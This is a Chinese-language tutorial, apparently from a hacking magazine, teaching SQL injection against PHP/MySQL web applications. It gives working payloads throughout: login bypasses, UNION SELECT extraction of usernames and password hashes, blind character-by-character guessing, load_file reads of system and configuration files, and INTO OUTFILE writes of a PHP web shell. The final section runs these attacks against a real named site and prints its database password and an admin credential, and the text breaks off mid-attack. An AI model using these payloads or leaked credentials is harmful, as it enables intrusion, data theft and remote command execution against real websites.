忘就忘了吧,下面再详细给你说说 

2.下面说一说mysql中的注释,这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。 
我们继续 
相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。 
Mysql有3种注释句法 
# 注射掉注释符后面的本行内容 
-- 注射效果同# 
 ...   注释掉符号中间的部分 

对于#号将是我们最常用的注释方法。 
-- 号记得后面还得有一个空格才能起注释作用。 
…  我们一般只用前面的就够了,因为后面的我们想加也不行,是吧? 

注意:在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。 
为了大家深刻理解 
这里我给大家来个例题 

有如下的管理员信息表 

CREATE TABLE alphaauthor ( 
  Id tinyint(4) NOT NULL auto_increment, 
  UserName varchar(50) NOT NULL default '', 
  PASSWORD varchar(50) default NULL, 
  Name varchar(50) default NULL, 
  PRIMARY KEY  (Id), 
  UNIQUE KEY Id (Id), 
  KEY Id_2 (Id) 

php 
Login.php 
…… 
$query=select  from alphaauthor where UserName='$username' and Password='$passwd'; 
$result=mysql_query($query); 
$data=mysql_fetch_array($result); 
if ($data) 
    { 
    Echo “重要信息”; 
    } 
    Else 
    Echo “登陆失败”;  
…… 

我们在浏览器地址框直接输入 
httplogin.phpusername=a’or id=1 %23 
%23转换成#了 
放到sql语句中 
select  from alphaauthor where UserName='a’or id=1 #' and Password='$passwd' 
#号后面的都拜输入了,看看 
这句话等价于 
select  from alphaauthor where UserName='a’or id=1 

再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真 
我们就直接登陆了,当然你也可以写 
hpptlogin.phpusername=a’or 1=1 %23 
一样的啦 

3.下面将要出场的是…… 
对了,就是这些显示系统信息的间谍们 

VERSION() 返回数据库版本信息 
DATABASE() 返回当前的数据库名字,如果没有当前的数据库,DATABASE()返回空字符串。 
USER()  
SYSTEM_USER()  
SESSION_USER() 
返回当前MySQL用户名 
mysql; select user(),database(),version(); 
+----------------+------------+----------------+ 
 user()          database()  version()       
+----------------+------------+----------------+ 
 root@localhost  alpha       5.0.0-alpha-nt  
+----------------+------------+----------------+ 
1 row in set (0.01 sec) 
如图(1)所示,图不是很爽是不是?睁大你的大眼睛好好看哦 

有时候很有用的哦,比如说你可以根据他的mysql版本看看他的mysql有没有什么溢出漏洞,没准我们就发现个好动东哈哈 

4. 下面进入最重要的部分了,没睡觉的打起精神来,睡着了的醒一醒啦。 
1)select union select 
还是php中文手册中讲的: 
SELECT ... UNION [ALL] SELECT ... [UNION SELECT ...] 
UNION 在 MySQL 4.0.0 中被实现。  
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。  

在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。  
SELECT 命令是一个普通的选择命令,但是有下列的限制:  
只有最后一个 SELECT 命令可以有 INTO OUTFILE。 

需要注意的是union前后的select字段数相同,只有这样union函数才能发挥作用。如果字段数不等将返回 
ERROR 1222 (21000) The used SELECT statements have a different number of columns 错误 
晕咯,这样不好吧。咋半哩? 
别急哈,急也没用的 
例如: 
已知alphadb表有11列 
我们 
mysql; select  from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor; 
如图(2) 

我们只slect了10个数当然出错啦。 
下面看 
mysql; select  from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
如图(3) 

我们看看id=247中的数据先 
mysql; select  from alphadb where id=347; 
+-----+--------------------------------------------+----------------- 
 id   title  content  importtime  author  accessing  addInto  type  showup  change_ubb  change_html  
+-----+--------------------------------------------+----------------- 
 347  利用adsutil.vbs+..--发表于黑客档案2004.6期  发表于黑客x档案第6期  2004 
-03-28 115050  Alpha   17  Alpha      2    1     1   1  
+-----+--------------------------------------------+----------------- 
1 row in set (0.00 sec) 
我们看到,它的返回结果和 
mysql; select  from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
是相同的。 
哦,大家或许会问,这样有什么用呢? 
问的好。 
Ok,继续试验 
当我们输入一个不存在的id的时候 
例如id=0,或者id=347 and 1;1 
再看看 
mysql; select  from alphadb where id=347 and 1;1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor; 
如图(4) 

我们发现它把我们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。 
哈哈,终于显示不一样了,可是这有什么用呢? 
先不告诉你。 
我们讲一个具体的例子先 
httplocalhostsitedisplay.phpid=347 
看看图5 

httplocalhostsitedisplay.phpid=347 and 1;1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor 
结果如图6 

下面我们用一幅图来总结一下union的用法如图7 

Ok,知道怎么利用了不?不知道的话下面将会详细告诉你。 
2)LOAD_FILE 
这个功能太强大了,这也是林.linx在上一个专题中提到的方法。虽然说过了,可我也不得不再提出来。 
Load_file可以返回文件的内容,记得写全文件的路径和文件名称 
Etc. 
我们在mysql的命令行下输入 

mysql; select load_file('cboot.ini'); 
效果如图(8) 

可是我们在网页中怎么搞呢? 
我们可以结合union select使用 
httplocalhostsitedisplay.phpid=347%20and%201;1%20union%20select%201,2,load_file('capachehtdocssitelibsql.inc'),4,5,6,7,8,9,10,11 
这里的capachehtdocssitelibsql.inc并不是我的配置文件哦,:P 
看仔细图9中的 

看看,文件内容暴露无疑。 
我们为什么要把load_file('capachehtdocssitelibsql.inc')放在3字段呢?我们前面提到列类型一共有那么三种,而原来图7中显示3的地方应该是显示文章内容,应该是字符型的,而load_file('capachehtdocssitelibsql.inc')也一定是字符型的,所以我们猜测放在3字段可以顺利显示。 
其实还有很多好的利用方法,继续往下看哦! 
3) select  from table into outfile'file.txt' 
有啥用哩? 
作用就是把表的内容写入文件,知道有多重要了吧,我们写个webshell吧,哈哈。 
当然我们不只是导出表,我们还可以导出其它东西的哦,往下看啦。 
假设有如下表 


# 数据表的结构 `test` 

CREATE TABLE test ( 
  a text, 
  b text 
) ENGINE=MyISAM DEFAULT CHARSET=latin1; 


# 导出下面的数据库内容 `test` 

INSERT INTO test VALUES ('php system($cmd); ;', NULL); 

已知我的网站路径在Capachehtdocssite 
好,看你表演哦,输入 
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'Capachehtdocssitecmd.php' 
意思就是把表里的a列内容导出到cmd.phpzhong 
看看cmd.php里的内容先 
1    2    php system($cmd); ;    0000-00-00 000000    5    6    7    8    9    10    11 
我们执行一下看看先 
httplocalhostsitecmd.phpcmd=dir 
如图(10) 

哈哈,果然很爽哦! 
4)下面给大家讲述LOAD DATA INFILE的故事 

LOAD DATA [LOW_PRIORITY] [LOCAL] INFILE 'file_name.txt' [REPLACE  IGNORE] INTO TABLE tbl_name 

LOAD DATA INFILE语句从一个文本文件中以很高的速度读入一个表中。 
因为这个语句一般情况下不能在浏览器里直接输入,所以作用不是很大。 

这里举个例子来说说 
表test的结构和上面介绍的一样 


# 数据表的结构 `test` 

CREATE TABLE test ( 
  a text, 
  b text 
) ENGINE=MyISAM DEFAULT CHARSET=latin1; 

我们在mysql命令行下输入: 
Mysql;load data infile 'ccmd.php' into table test 

其中ccmd.php内容为 
php system($cmd); ; 
注意:上面的内容写在一行里哦。 
通过上面的指令我们就把cmd.asp的内容输入到了test表中 
所得结果如图(11) 

实际上得到的就是上个例子test表中的内容!看看,再结合into outfile,是不是一个完美的组合呢。 
基本的语法就将到这里了,可能还有很多重要的东西漏掉了哦,你可以去php中文手册里淘金,相信你一定会找到很多好东西的,自己挖掘吧。(随光盘我们付上一个php中文手册) 

B从注入方式上 
主要有数字型,字符型和搜索类 
1.    数字型 
很常见了,我们上面举的就一直是字符型的例子,大家应该还都记得asp下如何破管理员密码,下面我们来看一下php下如何实现 
我们在地址栏输入: 
httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor) 
判断是否存在alphaauthor,如果有返回正常页面(一般情况啦,有的时候也返回其它什么的,这主要根据构造1=1 和1=2时的页面判断) 

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5) 
判断是否username字段的长度为5 

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5%20and%20length(password)=32) 
跟上面差不多啦,判断password字段的长度 

下面进入猜密码的阶段,用ascii方法来一位一位猜测吧。Ascii等同于asp下的asc,哈哈,经常看黑客X档案的一定很清楚啦。 
httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97) 
用户名第一位哦ascii97就是字符a啦 

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108) 
第二位啦,这里只放这一个图啦,如图(12) 

下面省略X条。 
反正我们最后是得出用户名和密码了。 
我们会发现这里的注入方法几乎和asp下的注入是一样的,就是把asc变成ascii,把len变成length就可以了,最后我们就可以得到后台的管理员账号和密码, 
当然我们有更简单的方法,可以直接用union的方法直接得到 

httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor 
如图(13) 

账号是alpha,密码是一长串的东东,哈哈,简单明了,看到没有,这里显示出了union select的强大威力了吧。 

上面讲的是在不通的表里面猜测内容,如果在同一个表里面我们还可以像下面这样哩: 
下面的一段代码根据用户id显示用户信息 

php 
user.php 
……….. 
$sql = SELECT  FROM user WHERE id=$id; 
………… 

if (!$result) 

echo wrong; 
exit; 

else 
echo 用户信息; 

猜测方法和上面几乎是一样的,就是我们不用再用select了。 
我们输入 
httplocalhostuser.phpid=1 and length(password)=7 
显示用户信息说明我们猜的正确,呵呵,comeon 

httplocalhostuser.phpid=1 and ascii(mid(password,1,1))=97 
第一位密码 
httplocalhostuser.phpid=1 and ascii(mid(password,2,1))=97 
第二位哦, 

通过这种方法最终我们也可以得出id=1的用户的账号密码 

2.    下面我们来看看字符型的注入方式 
在asp中字符型的注入方式很灵活,在php中字符型的注入就主要在 
magic_quotes_gpc=Off的情况下进行了。(除非有另外一种情况,先不告诉你) 

例如: 
php 
display.php 
…… 
$query=select  from alphadb where id=’”.$id.”’; 
………….. 

这样id就变成字符型的了。 
不知道大家发现没有,假如我们这样写程序的话,安全性会有所提高的哦 
    呵呵,继续了 
好我们检验是否有注入先 
httplocalhostsitedisplay.phpid=451' and 1=1 and ‘’=’ 
httplocalhostsitedisplay.phpid=451' and 1=2 and ‘’=’ 
带入到sql语句里就是 
select  from alphadb where id=’451’and 1=1 and ‘’=’’ 
select  from alphadb where id=’451’and 1=2 and ‘’=’’ 

如果你发现页面信息不同的话说明漏洞存在哦 
或者 
httplocalhostsitedisplay.phpid=451' and 1=1 %23 
httplocalhostsitedisplay.phpid=451' and 1=2 %23 
%23转化以后就是#,即注释的意思,上面说过了哦 
这样的话就不用考虑那个引号的闭合问题了,实际很多时候我们推荐这种方法。 
把它带入到sql语句里就成了 
select  from alphadb where id=’451’and 1=1 #’ 
正是我们想要的哦! 
看看效果吧,  
httplocalhostsitedisplay.phpid=451' and 1=1 %23 
图(14) 

正常显示了呓! 

httplocalhostsitedisplay.phpid=451' and 1=2 %23 
图(15) 

显示不正常,哈哈,说明问题存在 
我们继续哦: 
httplocalhostsitedisplay.phpid=451’%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor%23 
看图(16) 

Ok,用户名和密码又出来了哦! 
3.    大家一起来看看搜索型注入吧 
搜索型的语句一般这样写 
php 
search.php 
…… 
$query=select  from alphadb where title like '%$title%'; 
………….. 

不知道大家还是否记得asp里的注入呢? 
不过不记得也没有关系的啦,我们看吧。 
我们构建注入语句吧 
在输入框输入 
a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#放到sql语句中成了 

select  from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %' 
结果如图17哦 

怎么样,出来了吧,哈哈,一切尽在掌握之中。 

C:下面我们从注入地点上在来看一下各种注入攻击方式 
1)    首先来看看后台登陆哦 
代码先 
php 
login.php 
……. 
$query=select  from alphaauthor where UserName=' 
.$HTTP_POST_VARS[UserName].' and  
Password='. $HTTP_POST_VARS[Password].'; 
$result=mysql_query($query); 
$data=mysql_fetch_array($result); 
if ($data) 

echo “后台登陆成功”; 

esle 

echo “重新登陆”; 
exit; 
} 

……… 

Username和password没有经过任何处理直接放到sql中执行了。 
看看我们怎么绕过呢? 
最经典的还是那个: 
在用户名和密码框里都输入 
‘or’’=’ 
带入sql语句中成了 
select  from alphaauthor where UserName=’’or’’=’’ and Password=’’or’’=’’ 
这样带入得到的$data肯定为真,也就是我们成功登陆了。 
还有其他的绕过方法,原理是一样的,就是想办法让$data返回是真就可以了。 
我们可以用下面的这些中方法哦 
1. 
用户名和密码都输入’or’a’=’a 
Sql成了 
select  from alphaauthor where UserName=’’or’a’=’a’ and Password=’’or’a’=’a’ 

2. 
用户名和密码都输入’or 1=1 and ‘’=’ 
Sql成了 
select  from alphaauthor where UserName=’ ’or 1=1 and ‘’=’’ and Password=’ ’or 1=1 and ‘’=’’ 
用户名和密码都输入’or 2;1 and ‘’=’ 
Sql成了 
select  from alphaauthor where UserName=’ ’or 2;1 and ‘’=’’ and Password=’ ’or 2;1 and ‘’=’’ 

3. 
用户名输入’or 1=1 # 密码随便输入 
Sql成了 
select  from alphaauthor where UserName=’ ’or 1=1 # and Password=’anything’ 
后面部分被注释掉了,当然返回还是真哦。 
        4. 
假设admin的id=1的话你也可以 

用户名输入’or id=1 # 密码随便输入 
Sql成了 
select  from alphaauthor where UserName=’ ’or id=1 # and Password=’anything’ 
如图18 

看看效果图19 

怎么样?直接登陆了哦! 

俗话说的好,只有想不到没有做不到。 
还有更多的构造方法等着课后自己想啦。 

2)第二个常用注入的地方应该算是前台资料显示的地方了。 
上面已经多次提到了呀,而且涉及了数字型,字符型等等,这里就不再重复了哈。 
只是举个例子回顾一下 
碧海潮声下载站 - v2.0.3 lite有注入漏洞,代码就不再列出来了 
直接看结果 
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users 
如图20 

看看,我们又得到我们想要的了 
用户名alpha 
密码一长串。 
为什么我们要把password放在3字段处,把username放在5字段处了,我们上面已经提过了哦,就是我们猜测3和5段显示的应该是字符串型,而与我们要显示的username和password的字段类型应该相同,所以我们这样放了哦。 
为什么要用18个字段呢?不知道大家还是否记得在union select介绍那里我们提到union必须要求前后select的字段数相同,我们可以通过增加select的个数来猜测到需要18个字段,只有这样union select的内容才会正常显示哦! 
3)其它如资料修改,用户注册的地方主要得有用户等级的应用。 
我们在上面讲述update和insert的时候都已经讲到,因为不是很常用,这里就不再阐述,在下面将会提到一些关于update和insert的高级利用技巧。 
二:下面将要进入magic_quotes_gpc=On时候的注入攻击教学环节了 
    当magic_quotes_gpc=On的时候,交的变量中所有的 ' (单引号),  
“ (双引号),  (反斜线) 和 空字符会自动转为含有反斜线的转义字符。 
    这就使字符型注入的方法化为泡影,这时候我们就只能注入数字型且没有 
Intval()处理的情况了,数字型的我们已经讲了很多了是吧,由于数字型没有用到单引号自然就没有绕过的问题了,对于这种情况我们直接注入就可以了。 
1)假如是字符型的就必须得像下面这个样子,没有在字符上加引号 。 
     
这里我们要用到一些字符串处理函数先, 
字符串处理函数有很多,这里我们主要讲下面的几个,具体可以参照mysql中文参考手册7.4.10。 
     
    char() 将参数解释为整数并且返回由这些整数的ASCII代码字符组成的一个字符串。 
当然你也可以用字符的16进制来代替字符,这样也可以的,方法就是在16进制前面加0x,看下面的例子就明白了。 

    php 
    login.php 
    …… 
$query=select  from .$art_system_db_table['user'].  
where UserName=$username and Password='.$Pw.'; 
…… 

假设我们知道后台的用户名是alpha 
转化成ASCII后是char(97,108,112,104,97) 
转化成16进制是0x616C706861 
(我们将在光盘中提供16进制和ascii转换工具) 
好了直接在浏览器里输入: 

httplocalhostsiteadminlogin.phpusername=char(97,108,112,104,97)%23 
sql语句变成: 

select  from alphaAuthor where UserName=char(97,108,112,104,97)# and Password='' 
如图21 

    正如我们期望的那样,他顺利执行了,我们得到我们想要的。 
    当然咯,我们也可以这样构造 
httplocalhostsiteadminlogin.phpusername=0x616C706861%23 
sql语句变成: 
select  from alphaAuthor where UserName=0x616C706861%23# and Password='' 
我们再一次是成功者了。很有成就感吧, 

或许你会问我们是否可以把#也放在char()里 
实际上char(97,108,112,104,97)相当于’alpha’  
注意是alpha上加引号,表示alpha字符串。 
我们知道在mysql中如果执行 

mysql; select  from dl_users where username=alpha; 
ERROR 1054 (42S22) Unknown column 'alpha' in 'where clause' 
看返回错误了。因为他会认为alpha是一个变量。所以我们得在alpha上加引号。 
如下 
mysql; select  from dl_users where username='alpha'; 
这样才是正确的。 
如果你把#号也放到那里去了,就成了’alpha#’ 
带入sql语句中 
select  from dl_users where username='alpha#'; 
当然是什么也没有了,因为连alpha#这个用户都没有。 
好,下面我们再来看个例子, 

php 
    display.php  
    …… 
$query=select  from .$art_system_db_table['article'].  
where type=$type; 
…… 

代码根据类型来显示内容,$type没有任何过滤,且没有加引号放入程序中。 
假设type中含有xiaohua类,xiaohua的char()转换后是 
char(120,105,97,111,104,117,97) 

我们构建 
httplocalhostdisplay.phptype=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor 
带入sql语句中为: 
select  from .$art_system_db_table['article'].  
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor 
看看,我们的用户名和密码照样出来了哦!没有截图,想像一下咯:P 

2)    或许有人会问,在magic_quotes_gpc=On的情况下功能强大的load_file()还能不能用呢? 
这正是我们下面要将的问题了,load_file()的使用格式是load_file(‘文件路径’) 
我们发现只要把‘文件路径’转化成char()就可以了。试试看哦 
load_file(‘cboot.ini’)转化成 
load_file(char(99,58,47,98,111,111,116,46,105,110,105)) 
图22 

    放到具体注入里就是 
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 
看图23 

    看看,我们看到了boot.ini的内容了哦。 
很可惜的是into outfile’’ 不能绕过,不然就更爽了。但是还是有一个地方可以使用select  from table into outfile’’ 那就是….(先卖个关子,下面会告诉你) 
三:一些注入技巧,很多都是个人发现哦 
1.union select的技巧 
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。 
然而有我们可以用下面的方法来猜测列的类型,可是省去很多时间 
我们先 
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 
图24 

看看软件描述里写着3,作者里写着4,我们就可以猜测3和4的位置是字符型的,我们再看14前面的是下载次数,这就应该是int型的了,对吧。 
好了,我们根据这里来构建吧,估计username和password也是字符型的。 
试试看哦 
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users 
如图25 

哈哈,这种方法只要看看就可以大概猜到了。 
2.load_file读写文件的技巧 
不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如: 
'Capachehtdocssitelibsql.inc.php'转化为16进制为:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870 
我们构造如下 
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11 
如图26 

发现在文章内容的地方本来该显示sql.inc.php的,可是却空空之,为何呢? 
我们看看网页的源代码先 
图27 

哈哈,看看标记的地方,晕死,原来在这里啊,可是为什么哩? 
原来html中 ;用于标注,哈哈,明白了吧!下次可得记得在哪里找哦。 
4.    md5的恶梦 
山东大学的王博士最近可是搞md5搞的红透了,我们也来搞一搞吧,我们比他更爽,不用计算,哈哈。 
md5我们是有办法绕过的,但是并不是哪里都可以,php中的md5函数就不能绕过,因为你输入的所有东西都在里面,根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的,道理相同哦。 
看例子先: 
php 
login.php 
…… 
$query=select  from alphaauthor where UserName=md5($username) and Password='.$Pw.'; 
…… 

我们直接在浏览器提交 
httplocalhostadminlogin.phpusername=char(97,98)) or 1=1 %23 
带入sql语句成为select  from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password='.$Pw.' 
记得md5里面放的是字符,因为后面有or 1=2,所以我们随便放了个char(97,98).    Ok,登陆成功了哦!看看,md5在我们面前也没有什么用处。 
5.    核心技术,利用php+mysql注入漏洞直接写入webshell。。 
直接利用注入得到webshell,这应该是大家都很想的吧,下面就教给你。 
这里假设你已经知道了网站所在的物理路径,我这里假设网站路径为capachehtdocssite。网站的mysql连接信息放在libsql.inc.php里 
1)适用于magic_quotes_gpc=Off 
假设我们可以上传图片,或者txt,zip,等其它东西,我们把我们的木马改成 
jpg后缀的,上传后路径为upload2004091201.jpg 
2004091201.jpg中的内容为 php system($cmd); ; 
好,我们开始httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file('Capachehtdocssiteupload2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'Capachehtdocssiteshell.php' 
因为适用了outfile,所以网页显示不正常,但是我们的任务是完成了。 
如图28 
我们赶快去看看httplocalhostsiteshell.phpcmd=dir 
如图29 

爽否?Webshell我们已经创建成功了。看到最前面的12了没?那就是我们select 1,2所输出的! 
2)下面再讲一个适用于magic_quotes_gpc=On的时候保存webshell的方法哦,显然肯定也能用在于magic_quotes_gpc=Off的时候啦。 
我们直接读他的配置文件,用技巧2介绍的方法 
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11 
得到sql.inc.php内容为 
$connect=@mysql_connect(localhost,root,) or  die(Unable  to  connect  to  SQL  server);mysql_select_db(alpha,$connect) or  die(Unable  to  select  database);; 
好了我们知道了mysql的root密码了,我们找到phpmyadmin的后台 
httplocalhostphpmyadmin 
用root密码为空登陆。 
如图30 
然后我们新建立一个表结构内容如下: 


# 数据表的结构 `te` 

CREATE TABLE te ( 
  cmd text NOT NULL 
) ENGINE=MyISAM DEFAULT CHARSET=latin1; 


# 导出下面的数据库内容 `te` 

INSERT INTO te VALUES ('php system($cmd); ;'); 
Ok,是我们用select  from table into outfile’’的时候了 
直接在phpmyadmin的sql输入 
SELECT  FROM `te` into outfile 'Capachehtdocssitecmd1.php'; 
如图31 

Ok,成功执行,我们去httplocalhostsitecmd1.phpcmd=dir看看效果去 
如图32 

好爽的一个webshell是吧!哈哈,我也很喜欢。 
不过不知道大家有没有发现我们是在magic_quotes_gpc=On的情况下完成这项工作的,竟然在phpmyadmin里可以不用考虑引号的限制,哈哈,说明什么?说明phpmyadmin太伟大了,这也就是我们在谈magic_quotes_gpc=On绕过时所卖的那个关子啦! 
6.发现没有我们还可以利用update和insert来插入我们的数据,然后来得到我们的webshell哦,还用上面的那个例子, 
php 
reg.php 
…… 
$query = INSERT INTO members  
VALUES('$id','$login','$pass','$email',’2') ; 
…… 

我们在email的地方输入php system($cmd); ; 
假设我们注册后的id为10 
那么我们可以再找到一个可以注入的地方 
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile'Capachehtdocssitetest.php' 
好了,我们又有了我们的wenshell了哦。 
7.mysql的跨库查询 
大家是不是一直听说mysql不能跨库查询啊,哈哈,今天我将要教大家一个好方法,通过这个方法来实现变相的跨库查询,方法就是通过load_file来直接读出mysql中data文件夹下的文件内容,从而实现变态跨库查询。 
举个例子啦 
在这之前我们先讲一下mysql的data文件夹下的结构 
Data文件夹下有按数据库名生成的文件夹,文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件,例如 
Mysql中有alpha数据库,在alpha库中有alphaauthor和alphadb两个表, 
Alpha文件夹内容如下图33 

其中alphadb.frm放着lphadb表中的数据,alphadb.frm放着表的结构,alphadb.myi中放的内容随mysql的版本不通会有所不同,具体可以自己用记事本打开来判断。 
实验开始 
假设我们知道有另外的一个数据库yminfo210存在,且存在表user,user中放这admin的信息。 
我们 
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210user.myd'),4,5,6,7,8,9,10,11 
说明一下,load_file默认所在的目录是mysql下的data目录,所以我们用 
load_file('yminfo210user.myd'),当然load_file('.info210user.myd')也是一样的,注意的是into outfile的默认路径是在所在的数据库文件夹下。 

结果如图34  

我们看读出来的内容 
舼   admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer  httpwww.yoursite.com  (靃KA靃靃  127.0.0.1  d  aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd   E麷AM麷A 127.0.0.1 222  222222223423 
虽然乱码一堆,但是我们还是可以看出用户名是admin,密码是698d51a19d8a121ce581499d7b701668,后面其它的是另外的信息。 
通过这种方法我们就实现了曲线跨库,下面的例子中也会提到哦! 

说了这么多下面我们来具体的使用一次,这次测试的对象是国内一著名安全类站点――黑白网络 
听人家说黑白有漏洞?我们一起去看看吧。 
httpwww.heibai.netdownshow.phpid=5403%20and%201=1 
正常显示。 
如图35 

httpwww.heibai.netdownshow.phpid=5403%20and%201=2 
显示不正常。 
如图36 

好,我们继续 
httpwww.heibai.netdownshow.phpid=5403%20and%201=1 union select 1 
显示结果如下 
如图37 

注意看图中没有显示程序名,而且还附带了 
Warning mysql_fetch_object() supplied argument is not a valid MySQL result resource in Dwebheibaidownshow.php on line 45 

Warning mysql_fetch_array() supplied argument is not a valid MySQL result resource in Dwebheibaidownglobal.php on line 578 

晕了,网站路径出来了,那可就死定了哦! 
我们继续,直到我们猜到 
httpwww.heibai.netdownshow.phpid=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 
的时候正常显示了。 
如图38 

好我们转换语句成为 
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 
显示如图39 

看看简介处显示为12,我们可以猜测此处应该为字符型! 
Ok,我们下面看看文件内容先 
Dwebheibaidownshow.php转化成ascii后为 
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) 
我们 
view-sourcehttpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19 
view-source是指察看源代码,至于为什么用,我们后面将讲到 
显示出它的源代码 
如图40 

因为在show.php中有一句 
META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'; 
如果我们直接在浏览器里提交会跳转到list.php 
我们发现这句require (.includeconfig.inc.php); 
好东西,应该放这配置文件,ok继续 
dwebheibaidownincludeconfig.inc.php 
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) 
我们输入 
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 
显示结果如图41 

里面内容主要有 
………………….. 
ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序 
 ------------------------- -------- -------------------------   
                           常规设置                             
 ------------------------- -------- -------------------------   

 数据库信息  
$dbhost = localhost;  数据库主机名  
$dbuser = download; 数据库用户名  
$dbpasswd = kunstar988;  数据库密码  
$dbname = download;  数据库名  

 Cookie 名称  
$cookie_name = heibai; 
 版本号  
$version = 1.0.1;  

 数据表名  
$down_table = ymdown;  
$down_user_table = ymdown_user;  
$down_sort1_table = ymdown_sort1;  
$down_sort2_table = ymdown_sort2;  
晕原来用的是夜猫的下载系统,而且我们知道了 
$dbuser = download; 数据库用户名  
$dbpasswd = kunstar988;  数据库密码  
说不定呆会有用哦。 
用的表名是默认的表名,我们知道夜猫的管理员密码放在ymdown_user中 
我们继续httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user 
结果如图42 

根据提示我们知道文件大小处的是username,应用平台处的是password(对照图36) 
即username=dload,password=6558428,夜猫的后台默认在admin目录下,我试验了很久都没有找到,晕之。 
想直接连接mysql,发现telnet端口并没有开放。我们去看看别的吧! 
httpwww.heibai.netviparticlelogin.php 
看起来像是会员的登陆哦,我们看看先 
dwebheibaiviparticlelogin.php 
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112) 
我们输入 
